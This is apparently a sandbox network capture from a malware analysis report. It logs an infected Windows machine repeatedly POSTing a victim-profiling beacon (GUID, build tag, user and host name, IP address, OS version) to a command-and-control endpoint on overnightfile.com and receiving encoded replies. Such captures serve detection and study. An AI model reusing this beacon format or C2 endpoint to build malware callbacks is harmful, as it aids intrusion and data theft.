                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:20:34.623135090 CEST | 517 | IN | HTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:20:34 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 33 38 34 0d 0a 43 46 55 58 41 52 5a 41 45 67 34 4f 43 67 6c 41 56 56 55 62 47 52 6b 66 43 52 55 66 48 67 38 5a 47 77 34 54 44 42 56 55 47 52 55 58 56 51 30 4b 56 78 6b 56 46 41 34 66 46 41 35 56 44 68 49 66 46 78 38 4a 56 52 77 50 44 67 38 49 45 78 56 56 53 77 59 53 44 67 34 4b 51 46 56 56 48 68 4d 66 46 42 51 62 46 42 30 57 44 78 55 55 48 52 63 62 44 67 34 49 46 52 4d 4f 45 78 51 55 45 68 4d 66 46 31 51 5a 46 52 64 56 44 51 70 58 47 52 55 55 44 68 38 55 44 6c 55 4f 45 68 38 58 48 77 6c 56 48 41 38 4f 44 77 67 54 46 56 56 4c 42 68 49 4f 44 67 70 41 56 56 55 62 44 77 34 56 43 68 4d 57 46 51 34 4a 47 78 59 66 43 56 51 54 46 46 55 4e 43 6c 63 5a 46 52 51 4f 48 78 51 4f 56 51 6f 57 44 78 30 54 46 41 6c 56 53 77 59 53 44 67 34 4b 43 55 42 56 56 51 6b 53 48 77 67 65 46 51 67 55 41 78 6c 55 47 52 55 58 56 51 30 4b 56 78 6b 56 46 41 34 66 46 41 35 56 44 68 49 66 46 78 38 4a 56 52 77 50 44 67 38 49 45 78 56 56 53 77 63 42 47 45 41 53 44 67 34 4b 43 55 42 56 56 52 73 5a 47 52 38 4a 46 52 38 65 44 78 6b 62 44 68 4d 4d 46 56 51 5a 46 52 64 56 44 51 70 58 47 52 55 55 44 68 38 55 44 6c 55 4f 45 68 38 58 48 77 6c 56 48 41 38 4f 44 77 67 54 46 56 56 49 42 68 49 4f 44 67 70 41 56 56 55 65 45 78 38 55 46 42 73 55 48 52 59 50 46 52 51 64 46 78 73 4f 44 67 67 56 45 77 34 54 46 42 51 53 45 78 38 58 56 42 6b 56 46 31 55 4e 43 6c 63 5a 46 52 51 4f 48 78 51 4f 56 51 34 53 48 78 63 66 43 56 55 63 44 77 34 50 43 42 4d 56 56 55 67 47 45 67 34 4f 43 6b 42 56 56 52 73 50 44 68 55 4b 45 78 59 56 44 67 6b 62 46 68 38 4a 56 42 4d 55 56 51 30 4b 56 78 6b 56 46 41 34 66 46 41 35 56 43 68 59 50 48 52 4d 55 43 56 56 49 42 68 49 4f 44 67 6f 4a 51 46 56 56 43 52 49 66 43 42 34 56 43 42 51 44 47 56 51 5a 46 52 64 56 44 51 70 58 47 52 55 55 44 68 38 55 44 6c 55 4f 45 68 38 58 48 77 6c 56 48 41 38 4f 44 77 67 54 46 56 56 49 42 77 45 49 51 42 49 4f 44 67 6f 4a 51 
46 56 56 47 78 6b 5a 48 77 6b 56 48 78 34 50 47 52 73 4f 45 77 77 56 56 42 6b 56 46 31 55 4e 43 6c 63 5a 46 52 51 4f 48 78 51 4f 56 51 34 53 48 78 63 66 43 56 55 63 44 77 34 50 43 42 4d 56 56 55 6b 47 45 67 34 4f 43 6b 42 56 56 52 34 54 48 78 51 55 47 78 51 64 46 67 38 56 46 42 30 58 47 77 34 4f 43 42 55 54 44 68 4d 55 46 42 49 54 48 78 64 55 47 52 55 58 56 51 30 4b 56 78 6b 56 46 41 34 66 46 41 35 56 44 68 49 66 46 78 38 4a 56 52 77 50 44 67 38 49 45 78 56 56 53 51 59 53 44 67 34 4b 51 46 56 56 47 77 38 4f 46 51 6f 54 46 68 55 4f 43 52 73 57 48 77 6c 55 45 78 52 56 44 51 70 58 47 52 55 55 44 68 38 55 44 6c 55 4b 46 67 38 64 45 78 51 4a 56 55 6b 47 45 67 34 4f 43 67 6c 41 56 56 55 4a 45 68 38 49 48 68 55 49 46 41 4d 5a 56 42 6b 56 46 31 55 4e 43 6c 63 5a 46 52 51 4f 48 78 51 4f 56 51 34 53 48 78 63 66 43 56 55 63 44 77 34 50 43 42 4d 56 56 55 6b 48 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii:
                                                                                                                                      Jul 14, 2020 11:20:46.780814886 CEST | 734 | OUT | POST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:20:46.872651100 CEST | 734 | IN | HTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:20:46 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 4b 5a 41 50 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cKZAPARRABw==0
                                                                                                                                      Jul 14, 2020 11:20:47.414891005 CEST | 735 | OUT | POST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:20:47.503587008 CEST | 735 | IN | HTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:20:47 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 51 4b 50 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cQKPJARRABw==0
                                                                                                                                      Jul 14, 2020 11:20:48.780544043 CEST | 737 | OUT | POST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:20:48.869982958 CEST | 737 | IN | HTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:20:48 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 42 43 58 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cBCXYARRABw==0
                                                                                                                                      Jul 14, 2020 11:20:50.487967968 CEST | 738 | OUT | POST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:20:50.576773882 CEST | 738 | IN | HTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:20:50 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 5a 56 45 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cZVEAARRABw==0
                                                                                                                                      Jul 14, 2020 11:20:51.071022987 CEST | 739 | OUT | POST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:20:51.159069061 CEST | 739 | IN | HTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:20:50 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 56 4b 50 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cVKPEARRABw==0
                                                                                                                                      Jul 14, 2020 11:20:51.771171093 CEST | 740 | OUT | POST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:20:51.864172935 CEST | 740 | IN | HTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:20:51 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 46 47 54 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cFGTUARRABw==0
                                                                                                                                      Jul 14, 2020 11:20:52.231311083 CEST | 740 | OUT | POST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:20:52.319689035 CEST | 741 | IN | HTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:20:51 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 43 4d 4e 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cCMNXARRABw==0
                                                                                                                                      Jul 14, 2020 11:20:52.748272896 CEST | 741 | OUT | POST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:20:52.841948986 CEST741INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:20:52 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 41 4e 4d 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cANMZARRABw==0
                                                                                                                                      Jul 14, 2020 11:20:53.165904999 CEST742OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:20:53.257359028 CEST742INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:20:52 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 4a 4a 51 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cJJQQARRABw==0
                                                                                                                                      Jul 14, 2020 11:20:53.590437889 CEST743OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:20:53.680881023 CEST748INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:20:53 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 48 56 45 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cHVESARRABw==0
                                                                                                                                      Jul 14, 2020 11:20:54.015072107 CEST766OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:20:54.102811098 CEST766INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:20:53 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 47 5a 41 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cGZATARRABw==0
                                                                                                                                      Jul 14, 2020 11:20:54.420243979 CEST767OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:20:54.508830070 CEST767INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:20:54 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 59 42 59 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cYBYBARRABw==0
                                                                                                                                      Jul 14, 2020 11:20:54.879888058 CEST772OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:20:54.967772961 CEST775INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:20:54 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 4a 59 42 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cJYBQARRABw==0
                                                                                                                                      Jul 14, 2020 11:20:55.323348045 CEST780OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Data Raw: 47 55 49 44 3d 35 37 31 33 31 34 33 31 31 31 39 38 39 38 34 35 34 34 32 26 42 55 49 4c 44 3d 31 33 30 37 5f 71 73 65 77 26 49 4e 46 4f 3d 38 34 31 36 31 38 20 40 20 44 45 53 4b 54 4f 50 2d 4a 42 42 31 4b 4c 35 5c 4c 79 6e 6e 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 36 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                                                                                                                                      Data Ascii: GUID=5713143111989845442&BUILD=1307_qsew&INFO=841618 @ computer\user&IP=84.17.52.36&TYPE=1&WIN=10.0(x64)
                                                                                                                                      Jul 14, 2020 11:20:55.411665916 CEST780INHTTP/1.1 200 OK
                                                                                                                                      Server: nginx/1.16.1
                                                                                                                                      Date: Tue, 14 Jul 2020 09:20:55 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: keep-alive
                                                                                                                                      X-Powered-By: PHP/5.4.45
                                                                                                                                      Data Raw: 63 0d 0a 48 4a 51 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: cHJQSARRABw==0
                                                                                                                                      Jul 14, 2020 11:20:55.715173006 CEST781OUTPOST /4/forum.php HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                      Host: overnightfile.com
                                                                                                                                      Content-Length: 111
                                                                                                                                      Cache-Control: no-cache
